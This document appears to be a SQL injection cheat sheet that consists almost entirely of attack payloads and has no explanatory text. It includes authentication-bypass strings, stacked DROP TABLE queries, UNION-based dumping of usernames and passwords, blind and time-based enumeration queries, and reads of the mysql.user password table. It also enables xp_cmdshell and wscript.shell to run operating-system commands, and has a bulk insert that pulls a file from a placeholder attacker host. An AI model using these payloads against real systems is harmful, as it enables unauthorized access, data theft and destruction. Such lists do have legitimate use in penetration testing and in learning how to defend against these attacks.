--
DROP sampletable;--
#
DROP sampletable;#
admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password =
'password'
/*Comment Here*/
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
/*! MYSQL Special SQL */
SELECT /*!32302 1/0, */ 1 FROM tablename
10; DROP TABLE members /*
10; DROP
TABLE members --
SELECT /*!32302 1/0, */ 1 FROM tablename
/*! 32302 10*/
10
SELECT /*!32302 1/0, */ 1 FROM tablename
;
SELECT * FROM members; DROP members--
10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--
IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')
IF condition true-part ELSE false-part
IF (1=1) SELECT 'true' ELSE SELECT 'false'
BEGIN
IF condition THEN true-part; ELSE false-part; END IF; END;
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
END;
SELECT CASE WHEN condition THEN true-part ELSE false-part
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END;
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select
1/0
0xHEXNUMBER
SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45
+
SELECT login + '-' + password FROM members
||
SELECT login || '-' || password FROM members
CONCAT()
CONCAT(str1, str2, str3, ...)
SELECT CONCAT(login, password) FROM members
CHAR() CONCAT()
0x457578
SELECT 0x457578
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
CONCAT()
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT CHR(75)||CHR(76)||CHR(77)
SELECT (CHaR(75)||CHaR(76)||CHaR(77))
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ASCII()
SELECT ASCII('a')
CHAR()
SELECT CHAR(64)
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
field COLLATE SQL_Latin1_General_Cp1254_CS_AS
SELECT header FROM news UNION ALL SELECT name COLLATE
SQL_Latin1_General_Cp1254_CS_AS FROM members
Hex()
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
admin' AND 1=0 UNION ALL SELECT 'admin',
'81dc9bdb52d04dc20036dbd8313ed055'
1234
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2,
columnfromerror(n) HAVING 1=1 --
ORDER BY 1--
ORDER BY 2--
ORDER BY N--
' union select sum(columntofind) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null,
NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULl, NULL--
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 --
11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 --
11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 --
Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not allowed.
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
INSERT INTO members(id, user, pass) VALUES(1,
''+SUBSTRING(@@version,1,10) ,10)
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp
-c -Slocalhost -Usa -Pfoobar
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe' --
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
EXEC master.dbo.xp_cmdshell 'ping '
master..sysmessages
master..sysservers
masters..sysxlogins
sys.sql_logins
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result =
0) SELECT 0 ELSE SELECT 1/0
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10
;
';shutdown --
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
SELECT name FROM sysobjects WHERE xtype = 'U'
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE
name = 'tablenameforcolumnnames')
NOT IN NOT EXIST
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name
FROM members)
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from
(SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE
i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects
i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE
o.xtype = 'U') as p where p.x=21
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name
FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name =
'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
SELECT table_name FROM information_schema.tables WHERE table_schema =
'tablename'
SELECT table_name, column_name FROM information_schema.columns WHERE
table_schema = 'tablename'
SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND
ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)
WAITFOR DELAY '0:0:10'--
WAITFOR DELAY '0:0:0.51'
if (select user) = 'sa' waitfor delay '0:0:10'
1;waitfor delay '0:0:10'--
1);waitfor delay '0:0:10'--
1';waitfor delay '0:0:10'--
1');waitfor delay '0:0:10'--
1));waitfor delay '0:0:10'--
1'));waitfor delay '0:0:10'--
BENCHMARK(howmanytimes, do this)
IF EXISTS (SELECT * FROM users WHERE username = 'root')
BENCHMARK(1000000000,MD5(1))
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
SELECT pg_sleep(10);
SELECT sleep(10);
(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100)
THEN dbms_pipe.receive_message(('xyz'),10) ELSE
dbms_pipe.receive_message(('xyz'),1) END FROM dual)
product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1
product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Bo' || 'ok (OM)
product.asp?name=Book' OR 'x'='x
SELECT User,Password FROM mysql.user;
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0)
User,Password FROM mysql.user WHERE User = 'root';
SELECT ... INTO DUMPFILE
Write query output into a new file (cannot modify existing files)
create function LockWorkStation returns integer soname
'user32';
select LockWorkStation();
create function ExitProcess returns integer soname 'kernel32';
select exitprocess();
SELECT USER();
SELECT password,USER() FROM mysql.user;
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE
user_group = 1;
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;
select benchmark( 500000, sha1( 'test' ) );
query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')),
'false' );
select if( (ascii(substring(user(),1,1)) >> 7) & 1,
benchmark(100000,sha1('test')), 'false' );
MD5()
SHA1()
PASSWORD()
ENCODE()
COMPRESS()
ROW_COUNT()
SCHEMA()
VERSION()
@@version
' + (SELECT TOP 1 password FROM users ) + '
xx@xx.com
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'